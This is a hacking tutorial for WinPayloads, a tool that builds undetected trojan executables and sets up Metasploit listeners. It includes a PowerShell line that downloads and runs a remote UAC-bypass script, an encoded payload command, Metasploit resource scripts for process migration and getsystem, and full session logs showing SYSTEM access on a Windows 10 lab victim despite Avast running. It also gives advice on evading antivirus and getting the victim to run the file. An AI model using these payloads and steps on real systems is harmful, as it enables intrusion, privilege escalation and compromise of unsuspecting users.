in

WinPayloads Tutorial | Automated Payload and Listener Setup

Automated Payload and Listener

Automated Payload Generation and Server Setup with WinPayloads

alt tag

Once again with a little help from Powershell Empire, we introduce WinPayloads, another useful tool for quickly generating undetectable payloads (with integrated shellter), setting up metasploit and automatically performing privilege escalation on the target.

Below is a breakdown of the process of running WinPayloads

1. Cd into the directory of WinPayloads.
2. Execute “python WinPayloads.py”
3. Choose your option.

4. Specify the port
5. Let the tool get your local IP (or give it your external for WAN attacks)
6. It then will let you decide whether you want to elevate your privileges on the target system
7. Next you will have the option to embed your exploit into an unsuspicious PE (portable executable) with the help of Shellter.
8. At this point you can decide if you want to start a local webserver (Pythons SimpleHTTPServer) , attack via PSexec, or save it for later.
9. Now Msfconsole gets started and present to you the according listener. All you have to do is give the target system the URL specified by the tool (or the file at that URL) and wait for the trojan to get executed.

From this point on it will do its magic. Which means, it will exploit, migrate and elevate. In my testing Avast was kind enough to scan the “unknown” file, only to tell me after 15 secs that everything was okay and I could go on.

Below shows how the process performed by WinPayloads could be completed manually.

winpayloads breakdown


1. Create “bypassuac.ps1”, “uacbypass.rc”, “uacbypass2.rc”

1.1 Run bypassuac.ps1 (base64 encoded)

IEX (New-Object Net.WebClient).DownloadString("https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/privesc/Invoke-BypassUAC.ps1");
Invoke-BypassUAC -Command "powershell -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBw
.....snip.....
IAOwBpAGUAeAAgACIAJgAgACQAMwAgACQAMgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAb
ABsACAAJAAyACAAJABlACIAOwB9AA==" 


1.2 Runs uacbypass.rc

run post/windows/manage/migrate SESSION=1 NAME=explorer.exe SPAWN=false KILL=false
run post/windows/manage/exec_powershell SCRIPT=bypassuac.ps1 SESSION=1


1.3 Runs uacbypass2.rc

run post/windows/manage/migrate SESSION=2 NAME=spoolsv.exe SPAWN=false KILL=false
run post/windows/escalate/getsystem SESSION=2


2. Starts Msfconsole

       =[ metasploit v4.11.5-2015121501                   ]
+ -- --=[ 1517 exploits - 871 auxiliary - 256 post        ]
+ -- --=[ 436 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*]Exploit running as background job.
LPORT => 4445
[*]Started reverse handler on 0.0.0.0:4444 
autorunscript => multi_console_command -rc uacbypass2.rc
[*]Exploit running as background job.

[*]Started reverse handler on 0.0.0.0:4445 
[*]Starting the payload handler...
msf exploit(handler) >
[*]Starting the payload handler...


3. Exe gets downloaded via local Server

192.168.1.118 - - [11/Jan/2016 19:50:23] "GET /ReverseWindowsMeterpreter.exe HTTP/1.1" 200 -


4. Executable payload gets executed

[*]Sending stage (957487 bytes) to 192.168.1.118
[*]Meterpreter session 1 opened (192.168.1.111:4444 -> 192.168.1.118:49741) at 2016-01-11 19:51:50 +0100
[*]Session ID 1 (192.168.1.111:4444 -> 192.168.1.118:49741) processing AutoRunScript 'multi_console_command -rc uacbypass.rc'
[*]Running Command List ...
[*]    Running command run post/windows/manage/migrate SESSION=1 NAME=explorer.exe SPAWN=false KILL=false
[*]Running module against WIN10-VICTIM
[*]Current server process: ReverseWindowsMeterpreter.exe (6736)
[+] Migrating to 2828
[+] Successfully migrated to process 2828
[*]    Running command run post/windows/manage/exec_powershell SCRIPT=bypassuac.ps1 SESSION=1
[+] Compressed size: 8032
[*]#< CLIXML

[+] Finished!
[*]Sending stage (957487 bytes) to 192.168.1.118
[*]Meterpreter session 2 opened (192.168.1.111:4445 -> 192.168.1.118:49744) at 2016-01-11 19:52:33 +0100
[*]Session ID 2 (192.168.1.111:4445 -> 192.168.1.118:49744) processing AutoRunScript 'multi_console_command -rc uacbypass2.rc'
[*]Running Command List ...
[*]    Running command run post/windows/manage/migrate SESSION=2 NAME=spoolsv.exe SPAWN=false KILL=false
[*]Running module against WIN10-VICTIM
[*]Current server process: powershell.exe (6296)
[+] Migrating to 1764
[+] Successfully migrated to process 1764
[*]    Running command run post/windows/escalate/getsystem SESSION=2
[+] This session already has SYSTEM privileges


5. Metasploit opens 2 sessions (1 – Normal | 2 – Elevated)

sessions

Active sessions
===============

  Id  Type                   Information                                   Connection
  --  ----                   -----------                                   ----------
  1   meterpreter x64/win64  WIN10-VICTIM\Straight Shooter @ WIN10-VICTIM  192.168.1.111:4444 -> 192.168.1.118:49741 (192.168.1.118)
  2   meterpreter x64/win64  WIN10-VICTIM\Straight Shooter @ WIN10-VICTIM  192.168.1.111:4445 -> 192.168.1.118:49744 (192.168.1.118)

msf exploit(handler) >
[*]

6. Getuid on session 2

msf exploit(handler) > sessions -i 2
[*]Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


7. Getsystem on session 2


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


For testing this we used Kali 2.0 as an attacking machine and a Windows 10 (64bit) machine with a fully up to date Avast as the defending machine.

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Loading…

0
backdooring windows

Creating a hidden Wireless Access Point as a Backdoor on a Nearby Windows Machine

post exploitation

Post Exploitation with PowerShell